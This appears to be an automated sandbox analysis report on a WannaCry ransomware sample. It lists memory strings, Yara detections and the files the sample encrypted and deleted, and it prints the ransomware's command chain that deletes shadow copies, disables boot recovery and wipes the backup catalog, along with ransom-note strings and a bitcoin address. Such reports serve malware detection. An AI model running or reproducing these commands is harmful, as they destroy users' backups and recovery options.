Source: svchost.exe, 00000047.00000002.1367874845.000001DB1BE13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: WannaCry_2.EXE, 00000000.00000003.1411691066.0000000000A63000.00000004.00000020.00020000.00000000.sdmp, WannaCry_2.EXE, 00000000.00000003.1140110778.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 000000CA.00000000.1527615654.000000000041F000.00000008.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 000000CA.00000002.2383911467.0000000000421000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s
Source: WannaCry_2.EXE, 00000000.00000003.1411691066.0000000000A63000.00000004.00000020.00020000.00000000.sdmp, WannaCry_2.EXE, 00000000.00000003.1140110778.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 000000CA.00000000.1527615654.000000000041F000.00000008.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 000000CA.00000002.2383911467.0000000000421000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how
Source: @WanaDecryptor@.exe, 000000CA.00000002.2386689246.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
Source: svchost.exe, 00000047.00000003.1366925556.000001DB1BE58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000047.00000003.1366925556.000001DB1BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000002.1368352141.000001DB1BE59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000047.00000003.1366770859.000001DB1BE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000003.1367043880.000001DB1BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000003.1366925556.000001DB1BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000002.1368380250.000001DB1BE65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000002.1368532706.000001DB1BE81000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000003.1367113384.000001DB1BE41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000047.00000002.1368532706.000001DB1BE81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000047.00000003.1366925556.000001DB1BE58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000047.00000003.1366699932.000001DB1BE67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000047.00000003.1366457653.000001DB1BE86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000047.00000003.1366925556.000001DB1BE58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000047.00000003.1366770859.000001DB1BE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000002.1368145142.000001DB1BE3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000003.1367043880.000001DB1BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000003.1366925556.000001DB1BE58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000047.00000003.1366925556.000001DB1BE58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000047.00000002.1367979156.000001DB1BE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000003.1366699932.000001DB1BE67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000047.00000003.1366925556.000001DB1BE58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000047.00000003.1366925556.000001DB1BE58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000047.00000003.1366925556.000001DB1BE58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000047.00000003.1366770859.000001DB1BE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000002.1368145142.000001DB1BE3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000002.1368380250.000001DB1BE65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000047.00000002.1368188268.000001DB1BE44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000003.1367113384.000001DB1BE41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000047.00000003.1366925556.000001DB1BE58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000047.00000003.1366770859.000001DB1BE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000003.1367113384.000001DB1BE41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: @WanaDecryptor@.exe, 000000CA.00000002.2383330775.000000000019B000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
Source: svchost.exe, 00000047.00000003.1367113384.000001DB1BE41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000047.00000003.1367113384.000001DB1BE41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000047.00000003.1366770859.000001DB1BE62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000047.00000003.1367113384.000001DB1BE41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
Source: svchost.exe, 00000047.00000003.1367113384.000001DB1BE41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000047.00000003.1366925556.000001DB1BE58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000047.00000003.1367113384.000001DB1BE41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000047.00000002.1367979156.000001DB1BE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000003.1366699932.000001DB1BE67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000047.00000003.1367198337.000001DB1BE32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.sZ
Source: svchost.exe, 00000047.00000003.1367198337.000001DB1BE32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000002.1368020361.000001DB1BE36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ss
Source: svchost.exe, 00000047.00000003.1367198337.000001DB1BE32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dyn
Source: svchost.exe, 00000047.00000003.1367198337.000001DB1BE32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic
Source: svchost.exe, 00000047.00000003.1367198337.000001DB1BE32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtua
Source: svchost.exe, 00000047.00000003.1367113384.000001DB1BE41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000047.00000003.1367198337.000001DB1BE32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs(_
Source: svchost.exe, 00000047.00000003.1367113384.000001DB1BE41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000047.00000003.1367113384.000001DB1BE41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000047.00000002.1367979156.000001DB1BE2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000047.00000003.1367198337.000001DB1BE32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtuh
Source: svchost.exe, 00000047.00000003.1366925556.000001DB1BE58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000047.00000003.1366925556.000001DB1BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000002.1368352141.000001DB1BE59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
Source: @WanaDecryptor@.exe, 000000CA.00000002.2386689246.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 000000CA.00000000.1527615654.000000000041F000.00000008.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 000000CA.00000002.2383911467.0000000000421000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.google.com/search?q=how

Spam, unwanted Advertisements and Ransom Demands

Detected Wannacry Ransomware

Source: C:\Users\user\Desktop\WannaCry_2.EXE	Code function: CreateFileW,CreateFileW,GetFileSizeEx,GetFileTime,ReadFile,ReadFile,ReadFile,ReadFile,_local_unwind2,SetFilePointer,SetFilePointer,swprintf,CreateFileW,CreateFileW,ReadFile,SetFilePointer,WriteFile,SetFilePointer,WriteFile,SetFilePointer,rand,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,SetFilePointer,ReadFile,WriteFile,SetFilePointer,ReadFile,WriteFile,_local_unwind2,SetFileTime,FindCloseChangeNotification,CloseHandle,MoveFileW,SetFileAttributesW,DeleteFileW,CloseHandle,MoveFileW,_local_unwind2, WANACRY!		0_2_10001960
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Code function: CreateFileW,CreateFileW,GetFileSizeEx,GetFileTime,ReadFile,ReadFile,ReadFile,ReadFile,_local_unwind2,SetFilePointer,SetFilePointer,swprintf,CreateFileW,CreateFileW,ReadFile,SetFilePointer,WriteFile,SetFilePointer,WriteFile,SetFilePointer,rand,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,SetFilePointer,ReadFile,WriteFile,SetFilePointer,ReadFile,WriteFile,_local_unwind2,SetFileTime,FindCloseChangeNotification,CloseHandle,MoveFileW,SetFileAttributesW,DeleteFileW,CloseHandle,MoveFileW,_local_unwind2, WANACRY!		0_2_10001960

Yara detected Wannacry ransomware

Source: Yara match	File source: WannaCry_2.EXE, type: SAMPLE
Source: Yara match	File source: 202.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.WannaCry_2.EXE.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 000000CA.00000000.1527615654.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1411691066.0000000000A63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1140110778.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: WannaCry_2.EXE PID: 7008, type: MEMORYSTR
Source: Yara match	File source: C:\@WanaDecryptor@.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Desktop\u.wnry, type: DROPPED

Contains functionalty to change the wallpaper

Source: C:\Users\user\Desktop\WannaCry_2.EXE

Code function: 0_2_10004F20 swprintf,swprintf,MultiByteToWideChar,CopyFileW,CopyFileW,GetUserNameW,_wcsicmp,SystemParametersInfoW,swprintf,CopyFileW,

0_2_10004F20

Deletes shadow drive data (may be related to ransomware)

Source: WannaCry_2.EXE, 00000000.00000002.2385913238.00000000009D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet &
Source: WannaCry_2.EXE, 00000000.00000002.2385913238.00000000009D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet &
Source: WannaCry_2.EXE, 00000000.00000003.1411691066.0000000000A63000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: WannaCry_2.EXE, 00000000.00000003.1411691066.0000000000A63000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
Source: WannaCry_2.EXE, 00000000.00000003.1140110778.0000000000A03000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: WannaCry_2.EXE, 00000000.00000003.1140110778.0000000000A03000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
Source: @WanaDecryptor@.exe, 000000CA.00000000.1527615654.000000000041F000.00000008.00000001.01000000.00000009.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: @WanaDecryptor@.exe, 000000CA.00000000.1527615654.000000000041F000.00000008.00000001.01000000.00000009.sdmp	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\WannaCry_2.EXE	File moved: C:\Users\user\Desktop\NVWZAPQSQL\EIVQSAOTAQ.png	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File moved: C:\Users\user\Desktop\EFOYFBOLXA\ZGGKNSUKOP.pdf	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File deleted: C:\Users\user\Desktop\EFOYFBOLXA\ZGGKNSUKOP.pdf	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File moved: C:\Users\user\Desktop\EEGWXUHVUG.docx	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File deleted: C:\Users\user\Desktop\EEGWXUHVUG.docx	Jump to behavior

Writes many files with high entropy

Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\sharedscripts-939520eada[1].js.WNCRYT entropy: 7.99659840845	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AppData\CacheStorage\CacheStorage.edb.WNCRYT entropy: 7.99988622625	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRYT entropy: 7.99987291548	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\6hU_LneafI_NFLeDvM367ebFaKQ[1].js.WNCRYT entropy: 7.99037009332	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\aABLNT_FV45QjYQfnRHrBCAk4GU[1].js.WNCRYT entropy: 7.99872325193	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\WwF5sNrjseqq673SafWJ8p6dARY[1].js.WNCRYT entropy: 7.99686947982	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\X6j0qPgNij1n_IogMJrgYaT9Kp8[1].js.WNCRYT entropy: 7.99082771066	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png.WNCRYT entropy: 7.99018490928	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png.WNCRYT entropy: 7.99294394267	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.WNCRYT entropy: 7.99852818991	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.WNCRYT entropy: 7.99423786716	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db.WNCRYT entropy: 7.99925724678	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000a.db.WNCRYT entropy: 7.99937496677	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000d.db.WNCRYT entropy: 7.9993861641	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.WNCRYT entropy: 7.99975902129	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-0488A702D8A6400042FFB1D7ADF4EEF36AD772FD.bin.DB.WNCRYT entropy: 7.99989292947	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\ProgramData\Microsoft\ClickToRun\ProductReleases\3DD78803-01DE-4232-A9F6-781F290BD1C3\en-us.16\stream.x86.en-us.db.WNCRYT entropy: 7.9995988813	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\ProgramData\Microsoft\ClickToRun\ProductReleases\3DD78803-01DE-4232-A9F6-781F290BD1C3\x-none.16\stream.x86.x-none.db.WNCRYT entropy: 7.99988493876	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Temp\user.bmp.WNCRYT entropy: 7.99973117138	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Temp\jones.bmp.WNCRYT entropy: 7.99967276303	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.WNCRYT entropy: 7.99253380239	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133517913551623871.txt.WNCRYT entropy: 7.99838018207	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db.WNCRYT entropy: 7.99983831755	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133517913644287936.txt.WNCRYT entropy: 7.99841379748	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db.WNCRYT entropy: 7.99617708007	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133670572901062730.txt.WNCRYT entropy: 7.99835979529	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db.WNCRYT entropy: 7.99402457387	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133670573200963839.txt.WNCRYT entropy: 7.99834486559	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\appsconversions.txt.WNCRYT entropy: 7.99986852516	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db.WNCRYT entropy: 7.99153931087	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\appsglobals.txt.WNCRYT entropy: 7.99953769714	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db.WNCRYT entropy: 7.99231889014	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\appssynonyms.txt.WNCRYT entropy: 7.99916425913	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db.WNCRYT entropy: 7.99154769211	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\settingsglobals.txt.WNCRYT entropy: 7.99565628894	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2ba3710e-bf6a-46ef-97ed-2efbb606e519}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99524574722	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{40385465-94d7-4db6-a4cb-fc8229e20afa}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99533445436	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db.WNCRYT entropy: 7.99983265094	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c7a88677-8220-45ae-8b75-3e4ab11a6127}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99456911503	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db.WNCRYT entropy: 7.99994984323	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\settingsconversions.txt.WNCRYT entropy: 7.99965139689	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db.WNCRYT entropy: 7.99990645738	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\settingssynonyms.txt.WNCRYT entropy: 7.99856196947	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db.WNCRYT entropy: 7.99982478323	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{615928dd-022f-4339-b734-9a8a7fd59f58}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99917561682	Jump to dropped file
